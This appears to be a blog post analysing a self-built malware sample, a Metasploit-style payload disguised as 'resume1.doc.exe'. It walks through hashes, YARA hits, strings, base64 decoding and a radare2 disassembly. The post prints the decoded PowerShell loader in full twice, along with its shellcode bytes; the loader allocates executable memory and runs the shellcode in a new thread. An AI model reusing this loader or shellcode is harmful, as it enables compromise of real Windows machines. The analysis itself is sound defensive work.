Malware, data, and crime: Party on the malware bus

I've been playing with some ideas recently and it's actually kind of amusing the responses that I can get and identify the sources from. Lets start with one thing I generated with TheFatRat (basically wrapper for building metasploit compatible shells), testing the generation schemes I decided I would build some ways of doing this. Such as adding base64 of exec to one page and unicorn powershell script to another and using all that. Anyway, lets look:

5 minute easy mode analysis:

; Hashes unknown

rahash2 -a all ./resume1.doc.exe

./resume1.doc.exe: 0x00000000-0x000041ff md5: 90f7ee1bf4451349dfa7c518a8c6202a

./resume1.doc.exe: 0x00000000-0x000041ff sha1: 0c214854fef6ac5c28f84bf07ee6d39eb3595d82

./resume1.doc.exe: 0x00000000-0x000041ff sha256: ea2bb0a47fedb86127a59e71285f61036e1ff9c4e0a1d0fae6fe8f2931e4d5a6

./resume1.doc.exe: 0x00000000-0x000041ff sha384: abfd2915e8b1bce3c871a8faec67b503599908c24ba08dfdcc8ca52c04560ec132328a31f53d4c8853ce12256488d0ad

./resume1.doc.exe: 0x00000000-0x000041ff sha512: fac47672393b774135997b98c86874667a526bc40c8ab04745d4c28de3b1afdea9f8efc257a9e8e4f42d3341f065a81bde0fe93a220a3adae338a1776bb5a691

./resume1.doc.exe: 0x00000000-0x000041ff crc16: 9f78

./resume1.doc.exe: 0x00000000-0x000041ff crc32: 1b63e4bd

./resume1.doc.exe: 0x00000000-0x000041ff md4: 282dcd274bd2efade3765ddff3ec65e1

./resume1.doc.exe: 0x00000000-0x000041ff xor: eb

./resume1.doc.exe: 0x00000000-0x000041ff xorpair: 3ad1

./resume1.doc.exe: 0x00000000-0x000041ff parity: 00

./resume1.doc.exe: 0x00000000-0x000041ff entropy: 03000000

./resume1.doc.exe: 0x00000000-0x000041ff hamdist: 01

./resume1.doc.exe: 0x00000000-0x000041ff pcprint: 2d

./resume1.doc.exe: 0x00000000-0x000041ff mod255: 4d

./resume1.doc.exe: 0x00000000-0x000041ff xxhash: 5924b386

./resume1.doc.exe: 0x00000000-0x000041ff adler32: 913ba49c

./resume1.doc.exe: 0x00000000-0x000041ff luhn: 00

./resume1.doc.exe: 0x00000000-0x000041ff crc8smbus: 3f

./resume1.doc.exe: 0x00000000-0x000041ff crc15can: 5a1d

./resume1.doc.exe: 0x00000000-0x000041ff crc16hdlc: 4045

./resume1.doc.exe: 0x00000000-0x000041ff crc16usb: a732

./resume1.doc.exe: 0x00000000-0x000041ff crc16citt: 4b6a

./resume1.doc.exe: 0x00000000-0x000041ff crc24: 7a1917

./resume1.doc.exe: 0x00000000-0x000041ff crc32c: d18b15a4

./resume1.doc.exe: 0x00000000-0x000041ff crc32ecma267: df97a7b0

; yara matches

find /yararules/ -type f -name "*.yar" -exec yara -r {} ./resume1.doc.exe \; 2>/dev/null

without_urls ./resume1.doc.exe

_NET_executable__Microsoft_ ./resume1.doc.exe

_yodas_Protector_v1033_dllocx__Ashkbiz_Danehkar_h_ ./resume1.doc.exe

_NET_executable_ ./resume1.doc.exe

_Microsoft_Visual_C_v70__Basic_NET_ ./resume1.doc.exe

_Microsoft_Visual_Studio_NET_ ./resume1.doc.exe

_First_Publisher_Graphics_format_ ./resume1.doc.exe

_UPolyX_v05_ ./resume1.doc.exe

_Microsoft_Visual_C__Basic_NET_ ./resume1.doc.exe

_NET_executable__Microsoft_ ./resume1.doc.exe

_dUP_v2x_Patcher__wwwdiablo2oo2cjbnet_ ./resume1.doc.exe

_NET_executable_ ./resume1.doc.exe

_Microsoft_Visual_C_v70__Basic_NET_ ./resume1.doc.exe

_Microsoft_Visual_C__Basic_NET_ ./resume1.doc.exe

_Microsoft_Visual_Studio_NET_ ./resume1.doc.exe

_dUP_v2x_Patcher__wwwdiablo2oo2cjbnet_ ./resume1.doc.exe

_NET_executable_ ./resume1.doc.exe

_Microsoft_Visual_C_v70__Basic_NET_ ./resume1.doc.exe

_Microsoft_Visual_C__Basic_NET_ ./resume1.doc.exe

NETexecutableMicrosoft ./resume1.doc.exe

IsPE32 ./resume1.doc.exe

IsNET_EXE ./resume1.doc.exe

IsConsole ./resume1.doc.exe

Microsoft_Visual_Studio_NET ./resume1.doc.exe

Microsoft_Visual_C_v70_Basic_NET_additional ./resume1.doc.exe

Microsoft_Visual_C_Basic_NET ./resume1.doc.exe

Microsoft_Visual_Studio_NET_additional ./resume1.doc.exe

Microsoft_Visual_C_v70_Basic_NET ./resume1.doc.exe

NET_executable_ ./resume1.doc.exe

NET_executable ./resume1.doc.exe

domain ./resume1.doc.exe

without_attachments ./resume1.doc.exe

without_urls ./resume1.doc.exe

without_images ./resume1.doc.exe

_Microsoft_Visual_Cpp_v70_DLL_ ./resume1.doc.exe

without_images ./resume1.doc.exe

IP ./resume1.doc.exe

without_attachments ./resume1.doc.exe

contentis_base64 ./resume1.doc.exe

; strings

rabin2 -zz resume1.doc.exe

Metadata Signature: 0x268 0x10001424a5342 12

.NET Version: v4.0.30319

Number of Metadata Streams: 5

DirectoryAddress: 6c Size: f0

Stream name: #~ 4

DirectoryAddress: 15c Size: b8

Stream name: #Strings 12

DirectoryAddress: 214 Size: 3688

Stream name: #US 4

DirectoryAddress: 389c Size: 10

Stream name: #GUID 8

DirectoryAddress: 38ac Size: 38

Stream name: #Blob 8

vaddr=0x0000004d paddr=0x0000004d ordinal=000 sz=45 len=44 section=unknown type=ascii string=!This program cannot be run in DOS mode.\r\r\n$

vaddr=0x000000a9 paddr=0x000000a9 ordinal=001 sz=24 len=5 section=unknown type=utf32le string=Y `䀀 blocks=Basic Latin,CJK Unified Ideographs Extension A

vaddr=0x00000178 paddr=0x00000178 ordinal=002 sz=6 len=5 section=unknown type=ascii string=.text

vaddr=0x0000019f paddr=0x0000019f ordinal=003 sz=7 len=6 section=unknown type=ascii string=`.rsrc

vaddr=0x000001c7 paddr=0x000001c7 ordinal=004 sz=8 len=7 section=unknown type=ascii string=@.reloc

vaddr=0x00402056 paddr=0x00000256 ordinal=005 sz=5 len=4 section=.text type=ascii string=\n*2r

vaddr=0x00402068 paddr=0x00000268 ordinal=006 sz=5 len=4 section=.text type=ascii string=BSJB

vaddr=0x00402078 paddr=0x00000278 ordinal=007 sz=11 len=10 section=.text type=ascii string=v4.0.30319

vaddr=0x00402088 paddr=0x00000288 ordinal=008 sz=24 len=5 section=.text type=utf32le string=lð縣Ŝ¸ blocks=Basic Latin,Latin-1 Supplement,CJK Unified Ideographs,Latin Extended-A

vaddr=0x004020a0 paddr=0x000002a0 ordinal=009 sz=5 len=4 section=.text type=ascii string=ings

vaddr=0x004020bc paddr=0x000002bc ordinal=010 sz=6 len=5 section=.text type=ascii string=#GUID

vaddr=0x004020cc paddr=0x000002cc ordinal=011 sz=6 len=5 section=.text type=ascii string=#Blob

vaddr=0x004021c5 paddr=0x000003c5 ordinal=012 sz=9 len=8 section=.text type=ascii string=<Module>

vaddr=0x004021ce paddr=0x000003ce ordinal=013 sz=7 len=6 section=.text type=ascii string=pshcmd

vaddr=0x004021d9 paddr=0x000003d9 ordinal=014 sz=7 len=6 section=.text type=ascii string=system

vaddr=0x004021e0 paddr=0x000003e0 ordinal=015 sz=11 len=10 section=.text type=ascii string=msvcrt.dll

vaddr=0x004021ef paddr=0x000003ef ordinal=016 sz=7 len=6 section=.text type=ascii string=Object

vaddr=0x004021f6 paddr=0x000003f6 ordinal=017 sz=7 len=6 section=.text type=ascii string=System

vaddr=0x004021fd paddr=0x000003fd ordinal=018 sz=6 len=5 section=.text type=ascii string=.ctor

vaddr=0x00402203 paddr=0x00000403 ordinal=019 sz=5 len=4 section=.text type=ascii string=Main

vaddr=0x00402208 paddr=0x00000408 ordinal=020 sz=20 len=19 section=.text type=ascii string=csharpandpowershell

vaddr=0x0040221c paddr=0x0000041c ordinal=021 sz=30 len=29 section=.text type=ascii string=RuntimeCompatibilityAttribute

vaddr=0x0040223a paddr=0x0000043a ordinal=022 sz=32 len=31 section=.text type=ascii string=System.Runtime.CompilerServices

vaddr=0x0040225a paddr=0x0000045a ordinal=023 sz=9 len=8 section=.text type=ascii string=mscorlib

vaddr=0x00402263 paddr=0x00000463 ordinal=024 sz=24 len=23 section=.text type=ascii string=csharpandpowershell.exe

vaddr=0x0040227f paddr=0x0000047f ordinal=025 sz=4090 len=2045 section=.text type=utf16le string=powershell -window hidden -EncodedCommand JAB...AB

vaddr=0x00403279 paddr=0x00001479 ordinal=026 sz=4090 len=2045 section=.text type=utf16le string=4A...MA

vaddr=0x00404273 paddr=0x00002473 ordinal=027 sz=4090 len=2045 section=.text type=utf16le string=Yw...B9A

vaddr=0x0040526d paddr=0x0000346d ordinal=028 sz=1698 len=848 section=.text type=utf16le string=Ds...==였꽆쑜镨멁 blocks=Basic Latin,Hangul Syllables,CJK Unified Ideographs

vaddr=0x0040590f paddr=0x00003b0f ordinal=029 sz=6 len=5 section=.text type=ascii string=n'W]7

vaddr=0x0040592a paddr=0x00003b2a ordinal=030 sz=23 len=22 section=.text type=ascii string=WrapNonExceptionThrows

vaddr=0x00405982 paddr=0x00003b82 ordinal=031 sz=12 len=11 section=.text type=ascii string=_CorExeMain

vaddr=0x0040598e paddr=0x00003b8e ordinal=032 sz=12 len=11 section=.text type=ascii string=mscoree.dll

vaddr=0x00406062 paddr=0x00003c62 ordinal=033 sz=28 len=13 section=.rsrc type=utf16le string=_VERSION_INFO

vaddr=0x004060bc paddr=0x00003cbc ordinal=034 sz=22 len=10 section=.rsrc type=utf16le string=arFileInfo

vaddr=0x004060da paddr=0x00003cda ordinal=035 sz=24 len=11 section=.rsrc type=utf16le string=Translation

vaddr=0x004060fe paddr=0x00003cfe ordinal=036 sz=30 len=14 section=.rsrc type=utf16le string=StringFileInfo

vaddr=0x00406122 paddr=0x00003d22 ordinal=037 sz=18 len=8 section=.rsrc type=utf16le string=007f04b0

vaddr=0x0040613a paddr=0x00003d3a ordinal=038 sz=18 len=8 section=.rsrc type=utf16le string=Comments

vaddr=0x00406158 paddr=0x00003d58 ordinal=039 sz=22 len=10 section=.rsrc type=utf16le string=ompanyName

vaddr=0x0040617c paddr=0x00003d7c ordinal=040 sz=30 len=14 section=.rsrc type=utf16le string=ileDescription

vaddr=0x004061a6 paddr=0x00003da6 ordinal=041 sz=24 len=11 section=.rsrc type=utf16le string=FileVersion

vaddr=0x004061c0 paddr=0x00003dc0 ordinal=042 sz=16 len=7 section=.rsrc type=utf16le string=0.0.0.0

vaddr=0x004061d6 paddr=0x00003dd6 ordinal=043 sz=26 len=12 section=.rsrc type=utf16le string=InternalName

vaddr=0x004061f0 paddr=0x00003df0 ordinal=044 sz=40 len=19 section=.rsrc type=utf16le string=csharpandpowershell

vaddr=0x0040621e paddr=0x00003e1e ordinal=045 sz=30 len=14 section=.rsrc type=utf16le string=LegalCopyright

vaddr=0x00406248 paddr=0x00003e48 ordinal=046 sz=30 len=14 section=.rsrc type=utf16le string=egalTrademarks

vaddr=0x00406272 paddr=0x00003e72 ordinal=047 sz=34 len=16 section=.rsrc type=utf16le string=OriginalFilename

vaddr=0x00406294 paddr=0x00003e94 ordinal=048 sz=48 len=23 section=.rsrc type=utf16le string=csharpandpowershell.exe

vaddr=0x004062ca paddr=0x00003eca ordinal=049 sz=24 len=11 section=.rsrc type=utf16le string=ProductName

vaddr=0x004062f0 paddr=0x00003ef0 ordinal=050 sz=28 len=13 section=.rsrc type=utf16le string=roductVersion

; note

payload appears to be powershell payload with base64

; not valid length by itself

JAB...AMAB

; collecting base64 strings together

JAB...==

; writing decoded base64 to file

open('resumebase64.decoded','wb').write("""JAB...==""".decode('base64'))

; strings from decoded base64

rabin2 -zz resumebase64.decoded

vaddr=0x00000000 paddr=0x00000000 ordinal=000 sz=4090 len=2045 section=unknown type=utf16le string=$E2yZ = '$BVJ = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $BVJ -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xd9,0xe9,0xba,0x34,0x68,0x34,0x36,0xd9,0x74,0x24,0xf4,0x5e,0x33,0xc9,0xb1,0x47,0x31,0x56,0x18,0x83,0xc6,0x04,0x03,0x56,0x20,0x8a,0xc1,0xca,0xa0,0xc8,0x2a,0x33,0x30,0xad,0xa3,0xd6,0x01,0xed,0xd0,0x93,0x31,0xdd,0x93,0xf6,0xbd,0x96,0xf6,0xe2,0x36,0xda,0xde,0x05,0xff,0x51,0x39,0x2b,0x00,0xc9,0x79,0x2a,0x82,0x10,0xae,0x8c,0xbb,0xda,0xa3,0xcd,0xfc,0x07,0x49,0x9f,0x55,0x43,0xfc,0x30,0xd2,0x19,0x3d,0xba,0xa8,0x8c,0x45,0x5f,0x78,0xae,0x64,0xce,0xf3,0xe9,0xa6,0xf0,0xd0,0x81,0xee,0xea,0x35,0xaf,0xb9,0x81,0x8d,0x5b,0x38,0x40,0xdc,0xa4,0x97,0xad,0xd1,0x56,0xe9,0xea,0xd5,0x88,0x9c,0x02,0x26,0x34,0xa7,0xd0,0x55,0xe2,0x22,0xc3,0xfd,0x61,0x94,0x2f,0xfc,0xa6,0x43,0xbb,0xf2,0x03,0x07,0xe3,0x16,0x95,0xc4,0x9f,0x22,0x1e,0xeb,0x4f,0xa3,0x64,0xc8,0x4b,0xe8,0x3f,0x71,0xcd,0x54,0x91,0x8e,0x0d,0x37,0x4e,0x2b,0x45,0xd5,0x9b,0x46,0x04,0xb1,0x68,0x6b,0xb7,0x41,0xe7,0xfc,0xc4,0x73,0xa8,0x56,0x43,0x3f,0x21,0x71,0x94,0x40,0x18,0xc5,0x0a,0xbf,0xa3,0x36,0x02,0x7b,0xf7,0x66,0x3c,0xaa,0x78,0xed,0xbc,0x53,0xad,0x98,0xb6,0xc3,0x96,0x6a,0x77,0x71,0x4f,0x97,0x77,0x56,0xbf,0x1e,0x91,0xc8,0xef,0x70,0x0e,0xa8,0x5f,0x31,0xfe,0x40,0x8a,0xbe,0x21,0x70,0xb5,0x14,0x4a,0x1a,0x5a,0xc1,0x22,0xb2,0xc3,0x48,0xb8,0x23,0x0b,0x47,0xc4,0x63,0x87,0x64,0x38,0x2d,0x60,0x00,0x2a,0xd9,0x80,0x5f,0x10,0x4f,0x9e,0x75,0x3f,0x6f,0x0a,0x72,0x96,0x38,0xa2,0x78,0xcf,0x0e,0x6d,0x82,0x3a,0x05,0xa4,0x16,0x85,0x71,0xc9,0xf6,0x05,0x81,0x9f,0x9c,0x05,0xe9,0x47,0xc5,0x55,0x0c,0x88,0xd0,0xc9,0x9d,0x1d,0xdb,0xbb,0x72,0xb5,0xb3,0x41,0xad,

vaddr=0x00000ffa paddr=0x00000ffa ordinal=001 sz=1110 len=555 section=unknown type=utf16le string=0xf1,0x1b,0xb9,0x98,0x03,0x67,0x6c,0xe4,0x71,0x89,0xac;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$0dX3=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($0dX3.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$0dX3,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($E2yZ));$iS0 = "-enc ";if([IntPtr]::Size -eq 8){$BzQ = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $BzQ $iS0 $e"}else{;iex "& powershell $iS0 $e";}

; Investigating powershell

$E2yZ = '$BVJ = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $BVJ -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xd9,0xe9,0xba,0x34,0x68,0x34,0x36,0xd9,0x74,0x24,0xf4,0x5e,0x33,0xc9,0xb1,0x47,0x31,0x56,0x18,0x83,0xc6,0x04,0x03,0x56,0x20,0x8a,0xc1,0xca,0xa0,0xc8,0x2a,0x33,0x30,0xad,0xa3,0xd6,0x01,0xed,0xd0,0x93,0x31,0xdd,0x93,0xf6,0xbd,0x96,0xf6,0xe2,0x36,0xda,0xde,0x05,0xff,0x51,0x39,0x2b,0x00,0xc9,0x79,0x2a,0x82,0x10,0xae,0x8c,0xbb,0xda,0xa3,0xcd,0xfc,0x07,0x49,0x9f,0x55,0x43,0xfc,0x30,0xd2,0x19,0x3d,0xba,0xa8,0x8c,0x45,0x5f,0x78,0xae,0x64,0xce,0xf3,0xe9,0xa6,0xf0,0xd0,0x81,0xee,0xea,0x35,0xaf,0xb9,0x81,0x8d,0x5b,0x38,0x40,0xdc,0xa4,0x97,0xad,0xd1,0x56,0xe9,0xea,0xd5,0x88,0x9c,0x02,0x26,0x34,0xa7,0xd0,0x55,0xe2,0x22,0xc3,0xfd,0x61,0x94,0x2f,0xfc,0xa6,0x43,0xbb,0xf2,0x03,0x07,0xe3,0x16,0x95,0xc4,0x9f,0x22,0x1e,0xeb,0x4f,0xa3,0x64,0xc8,0x4b,0xe8,0x3f,0x71,0xcd,0x54,0x91,0x8e,0x0d,0x37,0x4e,0x2b,0x45,0xd5,0x9b,0x46,0x04,0xb1,0x68,0x6b,0xb7,0x41,0xe7,0xfc,0xc4,0x73,0xa8,0x56,0x43,0x3f,0x21,0x71,0x94,0x40,0x18,0xc5,0x0a,0xbf,0xa3,0x36,0x02,0x7b,0xf7,0x66,0x3c,0xaa,0x78,0xed,0xbc,0x53,0xad,0x98,0xb6,0xc3,0x96,0x6a,0x77,0x71,0x4f,0x97,0x77,0x56,0xbf,0x1e,0x91,0xc8,0xef,0x70,0x0e,0xa8,0x5f,0x31,0xfe,0x40,0x8a,0xbe,0x21,0x70,0xb5,0x14,0x4a,0x1a,0x5a,0xc1,0x22,0xb2,0xc3,0x48,0xb8,0x23,0x0b,0x47,0xc4,0x63,0x87,0x64,0x38,0x2d,0x60,0x00,0x2a,0xd9,0x80,0x5f,0x10,0x4f,0x9e,0x75,0x3f,0x6f,0x0a,0x72,0x96,0x38,0xa2,0x78,0xcf,0x0e,0x6d,0x82,0x3a,0x05,0xa4,0x16,0x85,0x71,0xc9,0xf6,0x05,0x81,0x9f,0x9c,0x05,0xe9,0x47,0xc5,0x55,0x0c,0x88,0xd0,0xc9,0x9d,0x1d,0xdb,0xbb,0x72,0xb5,0xb3,0x41,0xad,0xf1,0x1b,0xb9,0x98,0x03,0x67,0x6c,0xe4,0x71,0x89,0xac;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$0dX3=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($0dX3.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$0dX3,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($E2yZ));$iS0 = "-enc ";if([IntPtr]::Size -eq 8){$BzQ = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $BzQ $iS0 $e"}else{;iex "& powershell $iS0 $e";}

; saving hex as binary file

open('resumehex.bin','wb').write("0xd9,...0xac".replace(',','').replace('0x','').replace(' ','').decode('hex'))

; radare from bin

[0x00000000]> pD

0x00000000 d9e9 fldl2t

0x00000002 ba34683436 mov edx, 0x36346834

: 0x00000007 d97424f4 fnstenv dword [rsp - 0xc]

: 0x0000000b 5e pop rsi

: 0x0000000c 33c9 xor ecx, ecx

: 0x0000000e b147 mov cl, 0x47 ; 'G'

: 0x00000010 315618 xor dword [rsi + 0x18], edx

: 0x00000013 83c604 add esi, 4

: 0x00000016 035620 add edx, dword [rsi + 0x20]

: 0x00000019 8ac1 mov al, cl

: 0x0000001b caa0c8 retf -0x3760

: 0x0000001e 2a33 sub dh, byte [rbx]

: 0x00000020 30ada3d601ed xor byte [rbp - 0x12fe295d], ch

: 0x00000026 d09331dd93f6 rcl byte [rbx - 0x96c22cf], 1

: 0x0000002c bd96f6e236 mov ebp, 0x36e2f696

: 0x00000031 dade fcmovu st(0), st(6)

: 0x00000033 05ff51392b add eax, 0x2b3951ff

: 0x00000038 00c9 add cl, cl

,===< 0x0000003a 792a jns 0x66

|: 0x0000003c 82 invalid

|: 0x0000003d 10ae8cbbdaa3 adc byte [rsi - 0x5c254474], ch

|: 0x00000043 cdfc int 0xfc

|: 0x00000045 07 invalid

|: 0x00000046 499f lahf

|: 0x00000048 55 push rbp

|: 0x00000049 43fc cld

|: 0x0000004b 30d2 xor dl, dl

|: 0x0000004d 193dbaa88c45 sbb dword [0x458ca90d], edi

|: 0x00000053 5f pop rdi

|`==< 0x00000054 78ae js 4

|.--> 0x00000056 64 invalid

|: 0x00000057 ce invalid

|:,=< 0x00000058 f3e9a6f0d081 jmp 0xffffffff81d0f104

|:| 0x0000005e ee out dx, al

|:| 0x0000005f ea invalid

|:| 0x00000060 35afb9818d xor eax, 0x8d81b9af

|:| 0x00000065 5b pop rbx

`---> 0x00000066 3840dc cmp byte [rax - 0x24], al ; [0x2:1]=186

:| 0x00000069 a4 movsb byte [rdi], byte ptr [rsi]

:| 0x0000006a 97 xchg eax, edi

:| 0x0000006b ad lodsd eax, dword [rsi]

:| 0x0000006c d156e9 rcl dword [rsi - 0x17], 1

:| 0x0000006f ea invalid

:| 0x00000070 d5 invalid

:| 0x00000071 889c022634a7. mov byte [rdx + rax - 0x2f58cbda], bl

:| 0x00000078 55 push rbp

:,=< 0x00000079 e222 loop 0x9d

:|| 0x0000007b c3 ret

:|| 0x0000007c fd std

:|| 0x0000007d 61 invalid

:|| 0x0000007e 94 xchg eax, esp

:|| 0x0000007f 2f invalid

:|| 0x00000080 fc cld

:|| 0x00000081 a6 cmpsb byte [rsi], byte ptr [rdi] ; [0x2700000000:1]=255 ; 167503724544

:|| 0x00000082 43bbf20307e3 mov r11d, 0xe30703f2

:|| 0x00000088 16 invalid ; 0xe30703f2

:|| 0x00000089 95 xchg eax, ebp

:|| 0x0000008a c4 invalid

:|| 0x0000008b 9f lahf

:|| 0x0000008c 221e and bl, byte [rsi]

,===< 0x0000008e eb4f jmp 0xdf

|:|| 0x00000090 a364c84be83f. movabs dword [0x54cd713fe84bc864], eax ; [0x54cd713fe84bc864:4]=-1

|:|| 0x00000099 91 xchg eax, ecx

|:|| 0x0000009a 8e0d374e2b45 mov cs, word [0x452b4ed7] ; [0x452b4ed7:2]=0xffff

|:| 0x000000a0 d5 invalid ; [0x452b4ed7:2]=0xffff

|:| 0x000000a1 9b wait

|:| 0x000000a2 4604b1 add al, 0xb1

|:| 0x000000a5 686bb741e7 push -0x18be4895

|:| 0x000000aa fc cld

|:| 0x000000ab c4 invalid

|`==< 0x000000ac 73a8 jae 0x56

| | 0x000000ae 56 push rsi

| | 0x000000af 43 invalid

| .-> 0x000000b0 3f invalid

| :| 0x000000b1 217194 and dword [rcx - 0x6c], esi

| :| 0x000000b4 4018c5 sbb bpl, al

| :| 0x000000b7 0abfa336027b or bh, byte [rdi + 0x7b0236a3]

| :| 0x000000bd f7663c mul dword [rsi + 0x3c]

| :| 0x000000c0 aa stosb byte [rdi], al

| `=< 0x000000c1 78ed js 0xb0

| | 0x000000c3 bc53ad98b6 mov esp, 0xb698ad53

| | 0x000000c8 c3 ret

| | 0x000000c9 96 xchg eax, esi

| | 0x000000ca 6a77 push 0x77 ; 'w'

| ,=< 0x000000cc 714f jno 0x11d

| || 0x000000ce 97 xchg eax, edi

|,==< 0x000000cf 7756 ja 0x127

|||| 0x000000d1 bf1e91c8ef mov edi, 0xefc8911e

,====< 0x000000d6 700e jo 0xe6

||||| 0x000000d8 a85f test al, 0x5f ; '_'

||||| 0x000000da 31fe xor esi, edi

||||| 0x000000dc 408abe2170b5. mov dil, byte [rsi + 0x14b57021] ; [0x14b57021:1]=255

| ||| 0x000000e3 4a1a5ac1 sbb bl, byte [rdx - 0x3f]

||| 0x000000e7 22b2c348b823 and dh, byte [rdx + 0x23b848c3]

||| 0x000000ed 0b47c4 or eax, dword [rdi - 0x3c]

||| 0x000000f0 63 invalid

||| 0x000000f1 8764382d xchg dword [rax + rdi + 0x2d], esp

||| 0x000000f5 60 invalid

||| 0x000000f6 002a add byte [rdx], ch

||| 0x000000f8 d9805f104f9e fld dword [rax - 0x61b0efa1]

,===< 0x000000fe 753f jne 0x13f

; changed to 32 bit

radare2 -b 32 resumehex.bin

[0x00000000]> pD

0x00000000 d9e9 fldl2t

0x00000002 ba34683436 mov edx, 0x36346834

: 0x00000007 d97424f4 fnstenv dword [esp - 0xc]

: 0x0000000b 5e pop esi

: 0x0000000c 33c9 xor ecx, ecx

: 0x0000000e b147 mov cl, 0x47 ; 'G'

: 0x00000010 315618 xor dword [esi + 0x18], edx

: 0x00000013 83c604 add esi, 4

: 0x00000016 035620 add edx, dword [esi + 0x20]

: 0x00000019 8ac1 mov al, cl

: 0x0000001b caa0c8 retf -0x3760

: 0x0000001e 2a33 sub dh, byte [ebx]

: 0x00000020 30ada3d601ed xor byte [ebp - 0x12fe295d], ch

: 0x00000026 d09331dd93f6 rcl byte [ebx - 0x96c22cf], 1

: 0x0000002c bd96f6e236 mov ebp, 0x36e2f696

: 0x00000031 dade fcmovu st(0), st(6)

: 0x00000033 05ff51392b add eax, 0x2b3951ff

: 0x00000038 00c9 add cl, cl

,====< 0x0000003a 792a jns 0x66

|: 0x0000003c 82 invalid

|: 0x0000003d 10ae8cbbdaa3 adc byte [esi - 0x5c254474], ch

|: 0x00000043 cdfc int 0xfc

|: 0x00000045 07 pop es

|: 0x00000046 49 dec ecx

|: 0x00000047 9f lahf

|: 0x00000048 55 push ebp

|: 0x00000049 43 inc ebx

|: 0x0000004a fc cld

|: 0x0000004b 30d2 xor dl, dl

|: 0x0000004d 193dbaa88c45 sbb dword [0x458ca8ba], edi

|: 0x00000053 5f pop edi

|`===< 0x00000054 78ae js 4

| 0x00000056 64ce into

| ,==< 0x00000058 f3e9a6f0d081 jmp 0x81d0f104

| | 0x0000005e ee out dx, al

| |,=< 0x0000005f ea35afb9818d. ljmp 0x5b8d:0x81b9af35

`----> 0x00000066 3840dc cmp byte [eax - 0x24], al ; [0x2:1]=186

|:| 0x00000069 a4 movsb byte es:[edi], byte ptr [esi]

|:| 0x0000006a 97 xchg eax, edi

|:| 0x0000006b ad lodsd eax, dword [esi]

|:| 0x0000006c d156e9 rcl dword [esi - 0x17], 1

,==< 0x0000006f ead5889c0226. ljmp 0x3426:0x29c88d5

||:| 0x00000076 a7 cmpsd dword [esi], dword ptr es:[edi] ; [0x170000001c:4]=-1 ; 98784247836

||:| 0x00000077 d055e2 rcl byte [ebp - 0x1e], 1

||:| 0x0000007a 22c3 and al, bl

||:| 0x0000007c fd std

||:| 0x0000007d 61 popal

||:| 0x0000007e 94 xchg eax, esp

||:| 0x0000007f 2f das

||:| 0x00000080 fc cld

||:| 0x00000081 a6 cmpsb byte [esi], byte ptr es:[edi] ; [0x170000001c:1]=255 ; 98784247836

||:| 0x00000082 43 inc ebx

||:| 0x00000083 bbf20307e3 mov ebx, 0xe30703f2

||:| 0x00000088 16 push ss

||:| 0x00000089 95 xchg eax, ebp

||:| 0x0000008a c49f221eeb4f les ebx, [edi + 0x4feb1e22]

||:| 0x00000090 a364c84be8 mov dword [0xe84bc864], eax ; [0xe84bc864:4]=-1

||:| 0x00000095 3f aas

||`=< 0x00000096 71cd jno 0x65

||| 0x00000098 54 push esp

||| 0x00000099 91 xchg eax, ecx

||| 0x0000009a 8e0d374e2b45 mov cs, word [0x452b4e37] ; [0x452b4e37:2]=0xffff

||| 0x000000a0 d59b aad 0x9b

||| 0x000000a2 46 inc esi

||| 0x000000a3 04b1 add al, 0xb1

||| 0x000000a5 686bb741e7 push 0xe741b76b

||| 0x000000aa fc cld

||| 0x000000ab c473a8 les esi, [ebx - 0x58]

||| 0x000000ae 56 push esi

||| 0x000000af 43 inc ebx

||.-> 0x000000b0 3f aas

||:| 0x000000b1 217194 and dword [ecx - 0x6c], esi

||:| 0x000000b4 40 inc eax

||:| 0x000000b5 18c5 sbb ch, al

||:| 0x000000b7 0abfa336027b or bh, byte [edi + 0x7b0236a3]

||:| 0x000000bd f7663c mul dword [esi + 0x3c]

||:| 0x000000c0 aa stosb byte es:[edi], al

||`=< 0x000000c1 78ed js 0xb0

||| 0x000000c3 bc53ad98b6 mov esp, 0xb698ad53

||| 0x000000c8 c3 ret

||| 0x000000c9 96 xchg eax, esi

||| 0x000000ca 6a77 push 0x77 ; 'w' ; 119

||,=< 0x000000cc 714f jno 0x11d

|||| 0x000000ce 97 xchg eax, edi

,===< 0x000000cf 7756 ja 0x127

||||| 0x000000d1 bf1e91c8ef mov edi, 0xefc8911e

,====< 0x000000d6 700e jo 0xe6

|||||| 0x000000d8 a85f test al, 0x5f ; '_'

|||||| 0x000000da 31fe xor esi, edi

|||||| 0x000000dc 40 inc eax

|||||| 0x000000dd 8abe2170b514 mov bh, byte [esi + 0x14b57021] ; [0x14b57021:1]=255

|||||| 0x000000e3 4a dec edx

|||||| 0x000000e4 1a5ac1 sbb bl, byte [edx - 0x3f]

